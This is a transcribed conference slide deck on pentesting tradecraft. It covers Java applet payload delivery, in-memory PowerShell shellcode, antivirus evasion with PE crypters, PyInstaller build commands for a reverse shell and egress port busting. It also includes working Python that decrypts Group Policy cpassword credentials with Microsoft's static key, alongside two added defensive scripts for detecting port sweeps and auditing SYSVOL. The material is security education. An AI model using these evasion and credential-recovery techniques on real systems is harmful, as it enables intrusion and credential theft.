BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: [email protected] https://www.trustedsec.com @TrustedSec

BSIDESLV Secret Pentesting Techniques

Secret Pentesting Techniques from BSides Las Vegas 2013


Page 1: BSIDESLV Secret Pentesting Techniques

BSIDES Las Vegas

Secret Pentesting Techniques Shhh...

Dave Kennedy Founder, Principal Security Consultant

Email: [email protected] https://www.trustedsec.com

@TrustedSec

Page 2: BSIDESLV Secret Pentesting Techniques

Introduction

•  As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use.

•  Although some may or may not be public, they are generally obscure and not well known.

Page 3: BSIDESLV Secret Pentesting Techniques

•  The purpose of today’s talk is to show you my secrets: some of the techniques I use that aren’t widely known.

•  Why show you? I’m an open book on everything I do and sharing is what it’s all about.

Page 4: BSIDESLV Secret Pentesting Techniques

Technique #1

•  Java Applet Attack (SET) – well-known attack method, right?

•  Do you know how it actually works?

•  Do you know the techniques behind it to make it successful?

Page 5: BSIDESLV Secret Pentesting Techniques

ZOMG APT

•  News agencies around the world discovered a new and extremely advanced zero-day exploit against Java.

•  Made me feel kind of special =)

•  How did people find out it was SET?

Page 6: BSIDESLV Secret Pentesting Techniques

ILIKEHUGS

Page 7: BSIDESLV Secret Pentesting Techniques

DEMO:

Walking through the Attack

Page 8: BSIDESLV Secret Pentesting Techniques

Explaining the Applet

•  Parameters that are injected into the HTML code are pulled from the Applet.

•  Obfuscated and randomized each time.

•  Parameters tell the Applet which attacks to use.

Page 9: BSIDESLV Secret Pentesting Techniques

Method 1 – Binary Dropper

•  Binary is downloaded from the attacker machine via web server (Java downloader).

•  Obfuscated binary each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).

Page 10: BSIDESLV Secret Pentesting Techniques

DEMO:

Binary Dropping Technique

Page 11: BSIDESLV Secret Pentesting Techniques

Method 1 – Weak Sauce

•  Binaries are easily picked up by AV if signatures focus on the obfuscation techniques (SET changes them each version).

•  Direct interaction with Windows file system and writing to disk.

•  Multiple points of evidence on victim machine.

Page 12: BSIDESLV Secret Pentesting Techniques

Method 2 – Shellcodeexec

•  Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele.

•  Executable takes the alphanumeric shellcode as a command-line argument (int main(int argc, char *argv[])) and uses VirtualAlloc for read, write, and execute memory space.

•  Alphanumeric shellcode is executed in memory and payload is delivered.

Page 13: BSIDESLV Secret Pentesting Techniques

DEMO:

ShellcodeExec

Page 14: BSIDESLV Secret Pentesting Techniques

Method 2 – Easily detectable

•  Shellcodeexec is a simple yet awesome method but still has a number of drawbacks.

•  Like Method 1 – binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk.

•  Like Method 1 - Multiple points of evidence on victim machine.

Page 15: BSIDESLV Secret Pentesting Techniques

Method 3 – Powershell Injection

•  Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8).

•  Powershell gives us complete flexibility on a number of post exploitation situations.

•  Technique discovered by Matthew Graeber (you rock).

Page 16: BSIDESLV Secret Pentesting Techniques

Method 3 – PS ShellCode Injection

•  Applet detects if powershell is installed on the system.

•  Grabs the operating system type (x86 / x64).

•  Deploys Shellcode straight through powershell.

Page 17: BSIDESLV Secret Pentesting Techniques

DEMO:

ShellcodeExec

Page 18: BSIDESLV Secret Pentesting Techniques

Method 3 – Powershell Injection

•  Never touches disk – AV / HIPS signatures go out the door.

•  Obfuscated each time so that memory inspection is extremely difficult.

•  Extremely reliable and stable.

Page 19: BSIDESLV Secret Pentesting Techniques

PE Security Evasion

Page 20: BSIDESLV Secret Pentesting Techniques

Scenario 1 – Dropping PE’s like it’s hot

•  You’re using Metasploit – all of them are being picked up by AV, HIPS, etc.

•  In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion.

•  Couple cool ways to do this.

Page 21: BSIDESLV Secret Pentesting Techniques

Modifying PE For Evasion in MSF

•  Easiest way for me is to make a simple program that creates a RWX process, then have the program execute Metasploit shellcode.

•  You can also modify the Metasploit exe.rb template and obfuscate the code that way.

Page 22: BSIDESLV Secret Pentesting Techniques

PE Crypters

•  One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net).

•  Encrypts the PE file with AES 128 using a randomized simple cipher key.

•  When the executable is run, it brute forces the AES key, then decrypts the PE file for you.

Page 23: BSIDESLV Secret Pentesting Techniques

DEMO: Hyperion

Page 24: BSIDESLV Secret Pentesting Techniques

Hyperion Encryption

•  Very cool concept, and easy to use and to write one for yourself.

•  Ability to have a completely unique PE file each time.

•  Slight downfall: the stub used for the brute force is not polymorphic.

Page 25: BSIDESLV Secret Pentesting Techniques

Building a Simple Reverse Shell

Page 26: BSIDESLV Secret Pentesting Techniques

The Reverse Shell

•  Connects out to the attacker (reverse shell).

Page 27: BSIDESLV Secret Pentesting Techniques

Compiling Binaries

•  PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable.

•  Works on Linux, OSX, and Windows.

python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist

Page 28: BSIDESLV Secret Pentesting Techniques

Making it easy – pybuild.py

•  All code and samples will be released on the TrustedSec website soon.

Page 29: BSIDESLV Secret Pentesting Techniques

DEMO: Building a Shell

Page 30: BSIDESLV Secret Pentesting Techniques

Bypassing AV

Page 31: BSIDESLV Secret Pentesting Techniques

Finding your way home

Page 32: BSIDESLV Secret Pentesting Techniques

Bumping the Firewall

•  A number of companies restrict ports outbound and only allow what’s needed for the business.

•  Trouble getting payloads out, especially if you only have one shot.

Page 33: BSIDESLV Secret Pentesting Techniques

Egress Busting

•  Few ways to do it: a pre-staged payload for identifying the way out.

•  Attempt staged reverse on every port.

•  Metasploit has an ALLPORTS payload as well.

Page 34: BSIDESLV Secret Pentesting Techniques

Egress Buster 0.2

•  Server/client situation where the victim connects out on every port, 1024 ports at a time.

•  Server listens for connection and reports back.

•  Here’s where you can have some fun.
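Seen from the network side, a run like this is one internal host reaching one external address on hundreds of distinct ports within seconds. As an added detection example (not code from the talk or from TrustedSec; the log format, addresses and timestamps are constructed), the script below flags that pattern in firewall logs and reports which ports were actually allowed out, i.e. the egress holes a defender needs to close or watch.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed firewall log (not from the talk): 10.0.5.23 sweeps sequential outbound
# ports the way Egress Buster does and finds one hole (8443); 10.0.5.41 is normal traffic.
SAMPLE_LOG = "\n".join(
    [f"2013-07-31T10:00:{i:02d} DENY src=10.0.5.23 dst=203.0.113.10 dport={1024 + i} proto=tcp"
     for i in range(40)]
    + ["2013-07-31T10:00:05 ALLOW src=10.0.5.23 dst=203.0.113.10 dport=8443 proto=tcp",
       "2013-07-31T10:00:07 ALLOW src=10.0.5.41 dst=198.51.100.7 dport=443 proto=tcp",
       "2013-07-31T10:00:09 ALLOW src=10.0.5.41 dst=198.51.100.7 dport=80 proto=tcp"])

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) src=(?P<src>\S+) "
                     r"dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def detect_port_sweeps(log_text, min_ports=20, window_seconds=60):
    """Flag (src, dst) pairs that touched >= min_ports distinct destination ports
    within window_seconds. Each alert lists the ALLOWed ports, i.e. the egress
    holes the sweep discovered."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m["ts"])
            events[(m["src"], m["dst"])].append((ts, int(m["dport"]), m["action"]))
    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding time window over this pair's events
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({p for _, p, _ in evs[start:end + 1]}) >= min_ports:
                alerts[pair] = {
                    "distinct_ports": len({p for _, p, _ in evs}),
                    "allowed_ports": sorted({p for _, p, a in evs if a == "ALLOW"}),
                }
                break
    return alerts


if __name__ == "__main__":
    for (src, dst), info in detect_port_sweeps(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {info['distinct_ports']} ports tried, "
              f"allowed out on {info['allowed_ports']}")
```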

Page 35: BSIDESLV Secret Pentesting Techniques

Egress Buster Reverse Shell

Page 36: BSIDESLV Secret Pentesting Techniques

Egress Buster Reverse Shell

•  Released this week!

•  Allows you to bust all ports inside the firewall and spawn a command shell.

•  Custom, so no AV picks this up. Byte-compiled into an executable.

Page 37: BSIDESLV Secret Pentesting Techniques

DEMO:

Egress Buster Reverse Shell

Page 38: BSIDESLV Secret Pentesting Techniques

Egress Buster Reverse Shell Usage

•  Recent penetration test – found file upload + execute binaries.

•  Could not find a standard port out, i.e. 80, 443, 53, 25, etc.

•  Wrote this to deploy and found several obscure ports that were allowed.

Page 39: BSIDESLV Secret Pentesting Techniques

Fun with Group Policy

Page 40: BSIDESLV Secret Pentesting Techniques

One of my PERSONAL Favorites

•  How many times have we been on a pentest with just a domain user?

•  Need that local administrator account for all of the domain computers?

Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Page 41: BSIDESLV Secret Pentesting Techniques

The Attack

•  Navigate to a domain controller and hit up the SYSVOL share.

•  Head to the domain name and Policies folder.

•  Look for a GUID then MACHINE\Preferences\Group.

•  Look for the Groups.xml file.

Page 42: BSIDESLV Secret Pentesting Techniques

Contents of File

Page 43: BSIDESLV Secret Pentesting Techniques

Static Key for AES Anyone?

Page 44: BSIDESLV Secret Pentesting Techniques

Python Code

# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
from Crypto.Cipher import AES  # PyCryptodome
from base64 import b64decode

# Static AES-256 key Microsoft published for Group Policy Preferences
key = bytes.fromhex("""
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""")

cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

# The original PyCrypto call AES.new(key, 2) meant mode 2 = CBC with an all-zero IV
o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(cpassword)

# Strip the PKCS#7 padding, then decode the UTF-16LE plaintext
print(o[:-o[-1]].decode("utf-16-le"))

Page 45: BSIDESLV Secret Pentesting Techniques

Decrypted Password

>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!

Page 46: BSIDESLV Secret Pentesting Techniques

Expanding on Group.xml

Page 47: BSIDESLV Secret Pentesting Techniques

More Passwords Stored

•  The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.

•  Services, ScheduledTasks, SQL servers and much more are impacted.

Page 48: BSIDESLV Secret Pentesting Techniques

List of Other Affected Areas (from rewt dance)

Services\Services.xml
http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)

ScheduledTasks\ScheduledTasks.xml
http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)

Printers\Printers.xml
http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)

Drives\Drives.xml
http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)

DataSources\DataSources.xml
http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
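The practical defender's check that follows from pages 41 to 48 is an audit of SYSVOL for any Preferences XML that still carries a cpassword attribute. As an added example (not code from the talk or from TrustedSec), the script below parses one such file, reports every element holding a cpassword together with its account name, and confirms the exposure with the published key used on page 44; the Groups.xml content and the account name are constructed, and the per-file account attribute names are assumed from the GPP XML schemas.

```python
import base64
import xml.etree.ElementTree as ET

# Static key Microsoft published for GPP cpassword (same key the talk's snippet uses)
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Constructed sample shaped like MACHINE\Preferences\Groups\Groups.xml in SYSVOL;
# the cpassword value is the one shown on page 44 of the talk.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="localadmin" changed="2013-07-01 10:00:00">
    <Properties action="U" userName="localadmin"
        cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="/>
  </User>
</Groups>"""

# Assumed account attribute per preference type: Groups use userName, Services use
# accountName, ScheduledTasks use runAs, Drives and DataSources use username.
NAME_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source):
    """Return one finding per element carrying a non-empty cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.get("cpassword")
        if not cp:
            continue
        account = next((elem.get(a) for a in NAME_ATTRS if elem.get(a)), "<unknown>")
        # GPP often writes base64 without '=' padding; restore it so b64decode accepts it
        padded = cp + "=" * (-len(cp) % 4)
        findings.append({"file": source, "account": account, "cpassword": padded})
    return findings


def decrypt_cpassword(cpassword_b64):
    """Confirm exposure: AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE text.
    Returns None when PyCryptodome is not installed."""
    try:
        from Crypto.Cipher import AES
    except ImportError:
        return None
    data = base64.b64decode(cpassword_b64 + "=" * (-len(cpassword_b64) % 4))
    plain = AES.new(GPP_KEY, AES.MODE_CBC, b"\x00" * 16).decrypt(data)
    return plain[:-plain[-1]].decode("utf-16-le")


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, r"MACHINE\Preferences\Groups\Groups.xml"):
        print(f"{f['file']}: account '{f['account']}' stores a cpassword; "
              f"recoverable plaintext: {decrypt_cpassword(f['cpassword'])}")
```

Any hit is a finding regardless of whether the decrypt step runs: the key is public, so the presence of the attribute is the problem, and the fix is to delete the preference item and rotate the credential.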

Page 49: BSIDESLV Secret Pentesting Techniques

There’s a ton more of these…

Hopefully I can make these a series.

Page 50: BSIDESLV Secret Pentesting Techniques
Page 51: BSIDESLV Secret Pentesting Techniques

Downloads

For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.

Page 52: BSIDESLV Secret Pentesting Techniques

Secret Pentesting Techniques Shhh...

Dave Kennedy Founder, Principal Security Consultant

Email: [email protected] https://www.trustedsec.com

TrustedSec, LLC @TrustedSec